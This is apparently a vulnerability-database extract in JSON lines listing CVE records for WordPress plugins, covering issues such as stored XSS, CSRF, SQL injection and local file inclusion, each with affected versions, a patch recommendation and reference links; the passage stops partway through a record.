{"CVE_ID":"CVE-2024-10215","slug":"wpbookit","versionImpact":"1.6.4","versionEndExcluding":"1.6.6","description":"The WPBookit plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.6.4. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"name\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11089","slug":"anonymous-restricted-content","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The Anonymous Restricted Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to logged-in users.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191193\\\/anonymous-restricted-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191193\\\/anonymous-restricted-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a01f44-2356-4ea4-b48e-80e3c6114efa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a01f44-2356-4ea4-b48e-80e3c6114efa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36760","slug":"ocean-extra","versionEndExcluding":"1.6.6","description":"The Ocean Extra plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.5]. This is due to missing or incorrect nonce validation on the add_core_extensions_bundle_validation() function. This makes it possible for unauthenticated attackers to validate extension bundles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2391055%40ocean-extra&new=2391055%40ocean-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2391055%40ocean-extra&new=2391055%40ocean-extra&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb3ef121-13ea-4e42-90c1-1f4bd31ebbcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb3ef121-13ea-4e42-90c1-1f4bd31ebbcf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4431","slug":"featured-image-plus","versionImpact":"1.6.4","versionEndExcluding":"1.6.6","description":"The Featured Image Plus \u2013 Quick & Bulk Edit with Unsplash plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fip_save_attach_featured function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update featured image of any post.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209341fa-6761-4bc4-a921-afa98495a087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209341fa-6761-4bc4-a921-afa98495a087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4411","slug":"mihdan-yandex-turbo-feed","versionImpact":"1.6.5.1","versionEndExcluding":"1.6.6","description":"The Mihdan: Yandex Turbo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.6.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecf99ef-f879-426f-8a05-129be77f1157?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecf99ef-f879-426f-8a05-129be77f1157?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081039%40mihdan-yandex-turbo-feed%2Ftrunk&old=3005548%40mihdan-yandex-turbo-feed%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081039%40mihdan-yandex-turbo-feed%2Ftrunk&old=3005548%40mihdan-yandex-turbo-feed%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5004","slug":"cm-pop-up-banners","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The CM Popup Plugin for WordPress  WordPress plugin before 1.6.6 does not sanitise and escape some of the campaign settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bea7baa-84a2-4b21-881c-4f17822329e7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bea7baa-84a2-4b21-881c-4f17822329e7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1945","slug":"arforms-form-builder","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Contact Form, Survey & Popup Form Plugin for WordPress \u2013  ARForms Form Builder plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'arflite_remove_preview_data' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with subscriber access and above, to delete arbitrary site options, resulting in loss of availability.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/026f8d9b-a66b-4a59-8375-fba587a4eef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/026f8d9b-a66b-4a59-8375-fba587a4eef7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arforms-form-builder\\\/tags\\\/1.6.3\\\/core\\\/controllers\\\/arfliteformcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arforms-form-builder\\\/tags\\\/1.6.3\\\/core\\\/controllers\\\/arfliteformcontroller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3130","slug":"shorten-url","versionEndExcluding":"1.6.5","description":"The Short URL WordPress plugin before 1.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e167864-c304-402e-8b2d-d47b5a3767d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e167864-c304-402e-8b2d-d47b5a3767d1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6262","slug":"portfolio-filter-gallery","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Portfolio Gallery \u2013 Image Gallery Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PFG' shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adf6b34b-a362-4cfe-b062-8bbe11584581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adf6b34b-a362-4cfe-b062-8bbe11584581?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-filter-gallery\\\/trunk\\\/lightbox\\\/ld-lightbox\\\/js\\\/lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-filter-gallery\\\/trunk\\\/lightbox\\\/ld-lightbox\\\/js\\\/lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107963\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107963\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3435","slug":"user-activity-log","versionEndExcluding":"1.6.5","description":"The User Activity Log WordPress plugin before 1.6.5 does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a37a61-0d16-46f7-b9d8-721d983afc6b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a37a61-0d16-46f7-b9d8-721d983afc6b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34826","slug":"cf7-styler","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"Missing Authorization vulnerability in Tobias Conrad Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler.This issue affects Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler: from n\/a through 1.6.4.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cf7-styler\\\/wordpress-cf7-wow-styler-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cf7-styler\\\/wordpress-cf7-wow-styler-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13353","slug":"responsive-addons-for-elementor","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.4 via several widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php#L3151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php#L3151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php#L3725\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php#L3725\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-product-carousel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226779\\\/responsive-addons-for-elementor\\\/tags\\\/1.6.5\\\/includes\\\/widgets-manager\\\/widgets\\\/woocommerce\\\/class-responsive-addons-for-elementor-woo-products.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98df88f8-5aeb-4f57-8525-6a9357173b1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98df88f8-5aeb-4f57-8525-6a9357173b1d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13354","slug":"responsive-addons-for-elementor","versionImpact":"1.6.4","versionEndExcluding":"1.6.5","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML tags in several widgets in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226779%40responsive-addons-for-elementor&new=3226779%40responsive-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226779%40responsive-addons-for-elementor&new=3226779%40responsive-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46d71fb-ccf1-4cbe-8088-edb7fba225e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46d71fb-ccf1-4cbe-8088-edb7fba225e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11230","slug":"header-footer-elementor","versionImpact":"1.6.46","versionEndExcluding":"1.6.47","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018size\u2019 parameter in all versions up to, and including, 1.6.46 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.46\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.46\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194764\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194764\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d82c866-5b35-414e-bd72-30530930d5d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d82c866-5b35-414e-bd72-30530930d5d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10050","slug":"header-footer-elementor","versionImpact":"1.6.43","versionEndExcluding":"1.6.44","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 1.6.43 via the hfe_template shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to view the contents of Draft, Private and Password-protected posts they do not own.","recommendation":"Update to version 1.6.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.43\\\/inc\\\/class-header-footer-elementor.php#L634\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.43\\\/inc\\\/class-header-footer-elementor.php#L634\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173344\\\/header-footer-elementor\\\/trunk\\\/inc\\\/class-header-footer-elementor.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173344\\\/header-footer-elementor\\\/trunk\\\/inc\\\/class-header-footer-elementor.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13833","slug":"new-album-gallery","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The Album Gallery \u2013 WordPress Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.3 via deserialization of untrusted input from gallery meta. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246291\\\/new-album-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246291\\\/new-album-gallery\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc7075a6-5609-42ab-a4cb-9d33686c7de0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc7075a6-5609-42ab-a4cb-9d33686c7de0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0664","slug":"meks-smart-social-widget","versionEndExcluding":"1.6.4","description":"The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11765","slug":"gs-portfolio","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The WordPress Portfolio Plugin \u2013 A Plugin for Making Filterable Portfolio Grid, Portfolio Slider and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_portfolio' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-portfolio\\\/tags\\\/1.6.3\\\/gsportfolio-files\\\/includes\\\/templates\\\/gs_portfolio_sthree_kira.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-portfolio\\\/tags\\\/1.6.3\\\/gsportfolio-files\\\/includes\\\/templates\\\/gs_portfolio_sthree_kira.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204631%40gs-portfolio&new=3204631%40gs-portfolio&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204631%40gs-portfolio&new=3204631%40gs-portfolio&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e78440d-54ab-400f-a8d2-9cb33f1ec861?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e78440d-54ab-400f-a8d2-9cb33f1ec861?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13392","slug":"rate-star-review","versionImpact":"1.6.3","versionEndExcluding":"1.6.4","description":"The Rate Star Review Vote \u2013 AJAX Reviews, Votes, Star Ratings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_reviews' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224268%40rate-star-review&new=3224268%40rate-star-review&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224268%40rate-star-review&new=3224268%40rate-star-review&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb5a85ba-9545-4d64-ac7c-6b856e4ab354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb5a85ba-9545-4d64-ac7c-6b856e4ab354?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36735","slug":"erp","versionEndExcluding":"1.6.4","description":"The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.3. This is due to missing or incorrect nonce validation on the handle_leave_calendar_filter, add_enable_disable_option_save, leave_policies, process_bulk_action, and process_crm_contact functions. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01b90498-0ddb-4eb3-b76d-de30ed03d7d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01b90498-0ddb-4eb3-b76d-de30ed03d7d0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet